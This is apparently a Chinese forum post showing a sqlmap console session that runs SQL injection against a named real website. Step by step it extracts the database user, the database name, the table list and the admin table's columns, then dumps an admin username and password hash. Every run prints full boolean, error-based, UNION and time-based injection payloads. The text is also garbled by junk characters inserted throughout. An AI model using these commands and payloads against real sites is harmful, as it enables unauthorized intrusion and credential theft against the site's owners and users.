D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- r7 b0 U' L7 G% P
ms "Mysql" --current-user /* 注解:获取当前用户名称. J7 d3 d4 K/ X" E
sqlmap/0.9 - automatic SQL injection and database takeover tool' M- R' x% ]- I2 E. e, k* V
http://sqlmap.sourceforge.net starting at: 16:53:549 C- m1 n2 Z. Q# }
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% A/ ]9 k1 P( Q4 X0 m* P$ n) q" d' W9 F session file+ v& }" G% x* H9 ] s& Z* I5 g
[16:53:54] [INFO] resuming injection data from session file+ E" k$ ]- H% I( w
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
2 ^3 O+ p" D% x[16:53:54] [INFO] testing connection to the target url" L) R' x3 }4 _- | a
sqlmap identified the following injection points with a total of 0 HTTP(s) reque) ^( q2 E, A/ V% n) m7 T9 q
sts:% j7 U, ~0 a( v$ g$ ~+ n( |
---
) B+ e% @; s6 O( k$ }( F RPlace: GET, L$ n/ w, S6 _* O- c4 z1 `% w
Parameter: id
: j; h3 L4 R. a; ~1 a. P, J, P Type: boolean-based blind
; {. R' m& {/ X8 k9 l! w Title: AND boolean-based blind - WHERE or HAVING clause
& d& l$ G0 o4 F4 E. ~8 y Payload: id=276 AND 799=799
3 c' _2 [# C5 E2 q# y/ E, a$ f Type: error-based$ D* U& K+ }, N
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
: X( I1 H1 k8 p5 C% s6 O Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 j' \1 M- V- K& G# x120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 T" R/ b8 ?# R4 h1 v),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
c4 d0 r b9 b- e! m Type: UNION query ]0 ~' ?. Z7 h; |) y
Title: MySQL UNION query (NULL) - 1 to 10 columns4 |9 A% n9 t: k
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& t; i3 A4 E. g, Z2 R
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),- t0 \& }0 k; z, Q
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 a9 I/ n+ O- w1 u& M Type: AND/OR time-based blind1 Q+ J- d& L; I4 K4 T3 k
Title: MySQL > 5.0.11 AND time-based blind2 V. V( m0 Q. E- X! U( B
Payload: id=276 AND SLEEP(5)
" K4 T5 K( w: N- l---
/ @ m1 _" F! h# ][16:53:55] [INFO] the back-end DBMS is MySQL
7 f" ?7 f" j' I: w* |web server operating system: Windows4 w$ g8 |: j+ E1 H2 f0 g7 e: C- U
web application technology: Apache 2.2.11, PHP 5.3.0
* ^7 y; h! i/ d1 ^back-end DBMS: MySQL 5.0
; e2 B0 D; i( N9 @[16:53:55] [INFO] fetching current user
8 b2 O4 _8 r+ X7 t" Scurrent user: 'root@localhost' , C" x. H! j, I* L
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
- i1 ~# b6 t# X! `tput\www.wepost.com.hk' shutting down at: 16:53:58
0 r# U" _+ M9 }6 h3 w9 X) y* V6 @( R
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& T, r r7 [5 J" _% `6 E- E
ms "Mysql" --current-db /*当前数据库
3 ?( y1 f7 V4 P2 c; U3 F sqlmap/0.9 - automatic SQL injection and database takeover tool3 y7 Y$ o2 F- }4 y# u- _! j: q
http://sqlmap.sourceforge.net starting at: 16:54:166 p' n/ U7 W4 ~5 b
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% N+ V$ g" p+ D. }
session file" B$ z: F. X2 j8 v7 W
[16:54:16] [INFO] resuming injection data from session file
1 W9 [- V* n9 A$ v6 E/ u[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
8 d" h) ~9 w! n' z% L5 h. b[16:54:16] [INFO] testing connection to the target url
+ j& n9 A0 o' N2 k( {) I8 dsqlmap identified the following injection points with a total of 0 HTTP(s) reque- F& n4 [( I: P' { J! K$ \
sts:
9 W* ~4 U) N- Z$ S# W" c---8 ]4 N$ n8 x0 f# l$ R! \
Place: GET
' Y6 _8 T4 T! ZParameter: id
3 s/ s9 C) I' X Type: boolean-based blind
: N4 G K( M& [! a% W* ^ E { Title: AND boolean-based blind - WHERE or HAVING clause
; ^9 f, k1 o% o# [- |; b% b Payload: id=276 AND 799=799
+ |* A% `: I) ^5 L# q9 a, A Type: error-based
' X. W. J* Z, |9 J& W p* A- y Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 B) a, w% B: u4 Q5 m4 ? Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, m$ m- U: X& H8 K
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 ?0 T k% D# R3 ~+ N& w- o' @
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 m0 T$ R' L( P2 Y) s) f& \
Type: UNION query
0 f3 W$ i% t5 l Title: MySQL UNION query (NULL) - 1 to 10 columns' U W; h2 t" L) D% Q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
% ~8 J! T$ p' G) T0 ^# Q(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
/ `+ t# e/ W3 S$ o- w& |" ACHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" X0 ]( B7 k- ?% P8 Y# b7 v, r/ e
Type: AND/OR time-based blind
% @0 v7 ?5 V/ D" ~( e [( @4 q Title: MySQL > 5.0.11 AND time-based blind7 Y+ i z2 q) Q; z% W- [4 Z
Payload: id=276 AND SLEEP(5)) B) y }5 A% w" ^ a, n. R) k
---
( k" S: @4 M# l" j+ g# {2 X& m[16:54:17] [INFO] the back-end DBMS is MySQL) q- ~2 B$ O% Y9 c! c6 F6 {
web server operating system: Windows! a) j* N, i, Z3 h: Q0 m
web application technology: Apache 2.2.11, PHP 5.3.0
/ _ X+ k- H5 F. D! g9 o" B dback-end DBMS: MySQL 5.0
& F }# A" f" O$ w% X3 b[16:54:17] [INFO] fetching current database
/ C' k1 F F( f4 x i' ^, E: A/ _current database: 'wepost'3 a# m( X, l) y6 {; J) ]* |0 r& b
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: O4 R) ~. l# ?/ q l1 L: Ctput\www.wepost.com.hk' shutting down at: 16:54:18
, x0 v) ~0 g i$ a5 p% P6 _% K% X7 rD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# I u c! C& J+ U/ Q% S
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名1 P- u$ k8 t4 P' L/ j$ W% H
sqlmap/0.9 - automatic SQL injection and database takeover tool( s+ l$ e* Y" x
http://sqlmap.sourceforge.net starting at: 16:55:25, f; i0 R, t8 ~. g
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as) r! R+ Y$ F) b4 D4 g$ n& s
session file
- U/ @: Z F" k/ O[16:55:25] [INFO] resuming injection data from session file
0 ]8 [( f. Q( |# A; N[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. y$ p( H" D+ z9 I* D. Z
[16:55:25] [INFO] testing connection to the target url& _3 Q1 }2 T, R! `+ b2 h! G5 P
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
+ S; z& k+ t, k' [ hsts:2 ~, `& K: |* O, o0 l
---
' m5 w( b) F+ [' tPlace: GET6 P( |8 [6 t3 v$ a9 C! N
Parameter: id
) h; S7 ~2 }) @' E Type: boolean-based blind% |% @3 Z2 F+ N3 v
Title: AND boolean-based blind - WHERE or HAVING clause
9 y, ] w1 Y: _& m+ a* ^; i- W0 l. x Payload: id=276 AND 799=799
& a7 W( w5 L5 ]- Q Type: error-based6 ?: H( e' V9 j% F
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause+ I5 a# d3 c3 ?" l2 s
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% V0 N8 T0 H. w) S9 t; u4 [
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
$ L' l- M3 n; p6 ^),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); E) Z/ ^ e/ w g2 h% Y
Type: UNION query/ N& w8 @* ]3 I" T
Title: MySQL UNION query (NULL) - 1 to 10 columns
/ f8 t- T( a0 ]3 \% R7 A! S. j/ W Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 m K2 d2 G( Y+ L
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* d" C( @3 m4 }% j" M# O+ ?
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 F! Q' x/ b) `& p
Type: AND/OR time-based blind/ q2 f! s1 k. M3 q
Title: MySQL > 5.0.11 AND time-based blind
7 |# |! V* T# G* Y1 C Payload: id=276 AND SLEEP(5)
, @% A$ [9 [) V, G z---! l6 ?! H* y4 y h* ]
[16:55:26] [INFO] the back-end DBMS is MySQL
+ f8 k; i- t1 x. X5 X# ^1 e8 iweb server operating system: Windows
% ~# H* o; [9 D7 iweb application technology: Apache 2.2.11, PHP 5.3.09 {, o+ V3 w7 ] r$ z4 U. ]9 q
back-end DBMS: MySQL 5.0
/ G+ P- U$ L5 j; [( q$ f[16:55:26] [INFO] fetching tables for database 'wepost'
* h* i( L% f' R% W A4 p: U[16:55:27] [INFO] the SQL query used returns 6 entries
2 y2 g, w9 ]8 O; pDatabase: wepost5 f6 H, q/ Z# W2 i# W
[6 tables]4 N9 w; B' Q5 F3 M* f( H. F
+-------------+$ I7 C! m: Y" w z$ z/ s# R& U
| admin |
: ?: q; b/ a8 B4 H& l& z| article |
3 z2 a- L) b% o# ]7 h| contributor |
- t! W# Q @' H, g| idea |, g* v% W+ w; a2 W
| image |1 q; z, y+ ~6 ^( [0 U
| issue |
1 R. Q, v" f7 P5 j( v9 ^# x8 N2 F+-------------+
: G) B \7 \$ U5 K! B[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou1 H; p1 i2 n3 i% E0 C& q2 Q
tput\www.wepost.com.hk' shutting down at: 16:55:33' ]# W" _* w( r q" l/ E
# w4 `; u* X) g9 h. P! J
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* d8 C* u/ D; }3 K/ Hms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名7 ~2 e& {- u+ ?+ \
sqlmap/0.9 - automatic SQL injection and database takeover tool
; Q( W# o0 o7 }* ?# ` http://sqlmap.sourceforge.net starting at: 16:56:06$ p& G8 \6 S3 T K7 P* a2 o
sqlmap identified the following injection points with a total of 0 HTTP(s) reque3 z5 H+ F/ j g2 a
sts:
5 d! E% q! o0 B# H+ u8 q---
0 L% f4 j6 p! } OPlace: GET
% T# L% \- l& K" cParameter: id
' `. g, L- M. S1 F5 U Type: boolean-based blind
: k% F2 i" d: e, y* c0 o Title: AND boolean-based blind - WHERE or HAVING clause
# _, `: G, j* o6 [ Payload: id=276 AND 799=799
" Y8 E9 k& j) B, t Type: error-based. R& M( n0 q3 w5 u! g$ u3 v
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! u+ F& ]; D" l; j1 r2 y% i
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 m! a' U4 B2 `7 { H120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- t% q3 s# |- R7 `# s),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
: Z- z7 c8 Y2 o- ]0 B, c Type: UNION query
/ |8 h! k* v+ [, l9 n: D7 U9 \9 L8 M" f Title: MySQL UNION query (NULL) - 1 to 10 columns
F& t* C: W3 M Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR o; s1 y2 C6 a+ X/ Q6 K
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),) T" o" X* g# y* V
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; W, c& y9 f9 A, J. v0 K Type: AND/OR time-based blind
1 M$ \8 Y2 [4 P) F( ]/ d1 E Title: MySQL > 5.0.11 AND time-based blind
7 X/ n2 _. ]! A0 G+ Q Payload: id=276 AND SLEEP(5)9 {+ x, D3 g7 C3 j; P3 B0 ~/ g
---, ^' Y% @7 b. P" T4 U
web server operating system: Windows
+ u% x- [; R' R3 }web application technology: Apache 2.2.11, PHP 5.3.0, `; i7 K6 I5 \; [5 G6 b% R
back-end DBMS: MySQL 5.0
2 p$ c, J" j# f2 _6 D6 F[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se- M* ~9 ^7 d6 S Z" T2 T( [
ssion': wepost, wepost
9 e, ]9 E7 q7 YDatabase: wepost5 {# T h' d9 r9 i0 w: v
Table: admin* Q9 y& S' \$ s& `
[4 columns]# k) T, {4 [4 P
+----------+-------------+
0 _* I% A1 N s| Column | Type |
# x- i, x w/ V6 s$ w+----------+-------------+! _+ ]0 E! a% L& {- U# V; T
| id | int(11) |# l5 B9 I/ j% C
| password | varchar(32) |
! S! v9 C! J5 ?1 x| type | varchar(10) |+ F2 c! P: J# r* d
| userid | varchar(20) |# C1 [/ m) O; M+ R
+----------+-------------+- i5 G* z n* b+ P% ]! O9 N
shutting down at: 16:56:195 `9 }5 Y" W- U& p, J& {
# Z0 M8 B, Y5 u+ L+ b4 k1 x RD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& `- E; ~7 @; z+ G9 r5 Y# _" O7 C4 ]
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容) U. t6 o: h0 k4 e- R
sqlmap/0.9 - automatic SQL injection and database takeover tool
6 z" ^' }, G( o http://sqlmap.sourceforge.net starting at: 16:57:149 U4 R5 d b9 H" b7 F
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
2 r8 i: {3 A! h5 a2 ^1 Rsts:
. d. |8 y0 v9 B---* ^. l: l4 C8 Z! [, j: L+ m: p2 {/ l
Place: GET$ b6 q$ e7 ]8 E, o( W" U
Parameter: id1 u# ~7 I% h9 Q& K! _
Type: boolean-based blind
% U6 Q, k% R1 l0 Q) |* k Title: AND boolean-based blind - WHERE or HAVING clause0 d% P+ C7 S3 ]% K% T6 Q, Y
Payload: id=276 AND 799=7996 V$ S- b% { i
Type: error-based
$ I; p, \0 v; n3 s2 O2 C3 @ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
/ G7 N* N0 x. a Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,6 i# p( W# l( u& [3 U1 g
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58; D% X, |6 L: R1 L: h- g
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)6 d& G) I7 H/ t) d2 a. j
Type: UNION query
& \; k0 F1 P) p* S; } Title: MySQL UNION query (NULL) - 1 to 10 columns
4 f' K! f0 s5 y" V Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
1 @5 j% P; G9 ^(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ U- I3 |9 N6 \8 E5 r3 g& D
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, x) z2 V: @$ f, F1 A+ L
Type: AND/OR time-based blind
7 n* B$ M% \8 j/ [1 D1 q3 B1 p0 }" T Title: MySQL > 5.0.11 AND time-based blind# C2 H. O: D4 X) U3 G
Payload: id=276 AND SLEEP(5)- b& D& k6 x' z* D8 P/ n5 d
---
; k4 r4 ~& e/ e+ {web server operating system: Windows
: k3 R6 w# n- F8 Fweb application technology: Apache 2.2.11, PHP 5.3.00 E8 N# r) O# x
back-end DBMS: MySQL 5.0
4 g6 a# h7 |2 I1 l3 ]+ Yrecognized possible password hash values. do you want to use dictionary attack o0 Z- L) q ?1 k" h
n retrieved table items? [Y/n/q] y
/ ] p0 k7 `, i$ ^5 R7 m# Kwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]+ D, a6 y6 y& _5 `9 P1 h
do you want to use common password suffixes? (slow!) [y/N] y
# f: |7 ^& ` z0 ADatabase: wepost
$ v. p) Q. i& g* E& x; uTable: admin9 S6 m& F+ O( [! t. h% a
[1 entry]7 `0 B7 U6 t7 g2 S% b8 c
+----------------------------------+------------+ b" h& v- G1 j1 Y
| password | userid |- e1 h7 ^9 }! q3 m9 L2 C* `# f
+----------------------------------+------------+0 p( t9 f) C% T; Q, [
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |+ m9 U6 T# T0 L# Y0 _4 ~& t
+----------------------------------+------------+
% t. q/ i) S' f: ^# }" u' a0 o shutting down at: 16:58:141 L- j7 b% U! B3 |7 t/ \
0 Q" `* ~/ Q; ?4 JD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对